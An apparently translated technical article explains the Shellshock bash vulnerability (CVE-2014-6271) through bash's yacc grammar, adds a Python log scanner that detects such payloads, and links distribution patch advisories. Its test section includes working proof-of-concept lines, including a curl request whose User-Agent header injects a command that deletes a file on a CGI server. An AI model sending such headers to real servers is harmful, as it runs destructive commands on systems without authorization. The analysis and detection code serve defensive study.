Shellshock vulnerability analysis from the perspective of Syntax Parsing [CVE-2014-6271]

Source: Internet
Author: User

Document Description

This time, we will take a look at Bash syntax rules through poc analysis, and help you better understand bash and shellshock vulnerabilities from another perspective.

Vulnerability description
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
CVE-2014-6271 is a shell vulnerability discovered by Stéphane Chazelas (France). It is triggered by appending redundant strings after a function definition stored in an environment variable value; an attacker can exploit it to change or bypass environment restrictions and execute shell commands.
The vulnerability may affect OpenSSH sshd when the ForceCommand option is used, Apache servers using mod_cgi or mod_cgid, DHCP clients, and other applications that use bash as their interpreter.

Vulnerability Testing
1. Local test
# env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
Prints:
vulnerable
this is a test

2. HTTP CGI test
Construct poc.cgi.

Make sure that a test.file exists in the local www directory.
# curl http://127.0.0.1/poc.cgi -A '() { :;}; /bin/rm /www/test.file'
test.file has now been deleted:

# curl http://192.168.0.1/test.file
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
...
</body></html>

Vulnerability Analysis
In the preceding test, the input "x=() { :;}; /bin/rm /www/test.file" is parsed by bash's syntax analysis into a function definition followed by a command. That command is executed inside the parse_and_execute function, which is why test.file is deleted without authorization.
The following analysis shows how bash's grammar turns the character input "HTTP_USER_AGENT () { :;};\n/bin/rm /www/test.file" into a function definition plus a command. Understanding bash's syntax parsing process helps us understand the details of this vulnerability.

1. Bash's lexical and syntax analysis are implemented with flex and yacc. If you are not familiar with flex and yacc, look up the relevant material yourself; here is a brief introduction:
The flex lexical analyzer extracts words of each kind from the input stream and forms them into tokens for the syntax analyzer. The yacc syntax analyzer shifts grammar symbols and reduces them according to the grammar rules; the final reduction yields the start symbol S of the grammar.

2. Bash's lexical tokens can be found in y.tab.c, defined in arrays such as word_token_alist and other_token_alist. The bash grammar itself is defined in the parse.y file.
Analyze the input data: "HTTP_USER_AGENT () \n{\n :;\n}; /bin/rm /www/test.file"

When the parser is in the function_def state, the function definition is created by the following grammar action:
{ $$ = make_function_def ($1, $5, function_dstart, function_bstart); }
Here $1 = HTTP_USER_AGENT, $5 is the function body, function_dstart is the line on which the function definition starts,
and function_bstart is the line on which the function body starts.
/bin/rm /www/test.file is in the simple_command state; a command is created by calling the interface:
COMMAND *make_simple_command (element, command)

3. The parsing part of the parse_and_execute function is performed by yyparse, which is called from parse_command.


After parsing completes, no check is made that the parsed result consists only of a function definition. When the shell executes the command, it calls read_loop, which repeatedly calls read_command and finally command_execute to run the corresponding command, so the trailing command is executed along with the function definition.
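To make the parsing point above concrete from the defender's side, here is an added example (not code from the original article or from bash) that splits an environment value the way the function_def rule sees it: a body that ends at the balancing brace, and any trailing text, which is exactly what an unpatched bash went on to execute. It then scans constructed Apache log lines for User-Agent values of that shape; the log lines, the sample values and all function names are assumptions made for the example.

```python
import re

# Constructed sample lines in Apache combined-log format (not from the article).
# The last quoted field is the User-Agent that mod_cgi exports as HTTP_USER_AGENT.
LOG_LINES = [
    '10.0.0.5 - - [25/Sep/2014:10:00:01 +0000] "GET /poc.cgi HTTP/1.1" 200 12 "-" "Mozilla/5.0 (X11; Linux)"',
    '10.0.0.9 - - [25/Sep/2014:10:00:02 +0000] "GET /poc.cgi HTTP/1.1" 200 12 "-" "() { :;}; /bin/rm /www/test.file"',
    '10.0.0.9 - - [25/Sep/2014:10:00:03 +0000] "GET /poc.cgi HTTP/1.1" 200 12 "-" "() { if true; then { :; }; fi; }"',
]

# bash only treats a value as an exported function when it starts with the exact
# marker "() {"; the optional whitespace here is a deliberate broadening for detection.
FUNC_PREFIX = re.compile(r"^\(\)\s*\{")
UA_FIELD = re.compile(r'"([^"]*)"\s*$')  # last quoted field of a combined-log line


def split_function_export(value):
    """Split an environment value the way the parse.y grammar would see it:
    returns (is_funcdef, body, trailer).  The body ends at the brace that
    balances the opening one; 'trailer' is whatever follows, i.e. the extra
    text an unpatched bash parsed and executed as a second command.  Braces
    inside quotes are not special-cased, which is acceptable for a log scanner."""
    m = FUNC_PREFIX.match(value)
    if not m:
        return False, "", value
    depth, i = 1, m.end()
    while i < len(value) and depth:
        depth += {"{": 1, "}": -1}.get(value[i], 0)
        i += 1
    if depth:                       # unterminated body: bash rejects the definition
        return True, value[m.end():], None
    return True, value[m.end():i - 1], value[i:].strip(" \t;")


def is_shellshock_payload(value):
    """True when a function definition is followed by a trailing command."""
    is_func, _, trailer = split_function_export(value)
    return is_func and bool(trailer)


def flag_log_lines(lines):
    """Return (line_number, trailer) for each request whose User-Agent would
    have been executed by an unpatched bash behind mod_cgi."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = UA_FIELD.search(line)
        if m and is_shellshock_payload(m.group(1)):
            hits.append((n, split_function_export(m.group(1))[2]))
    return hits


if __name__ == "__main__":
    for n, trailer in flag_log_lines(LOG_LINES):
        print("line %d: function definition followed by %r" % (n, trailer))
```

A well-formed exported function (line 3 in the sample) has nothing after its closing brace and is not flagged; only the value with a trailer is reported.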


Vulnerability fix:
Below are the official advisories of the relevant Linux distributions. System administrators and webmasters should follow these links and download the latest patches promptly to fix the bash vulnerability.

http://lists.centos.org/pipermail/centos-announce/2014-September/
https://www.debian.org/security/2014/dsa-3035
https://rhn.redhat.com/errata/RHSA-2014-1306.html
http://www.ubuntu.com/usn/usn-2363-1/
http://support.novell.com/security/cve/CVE-2014-7169.html
